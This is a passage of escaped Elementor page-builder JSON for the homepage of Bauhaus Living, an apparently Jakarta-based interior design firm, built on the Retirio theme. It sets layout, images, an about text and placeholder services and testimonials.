image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"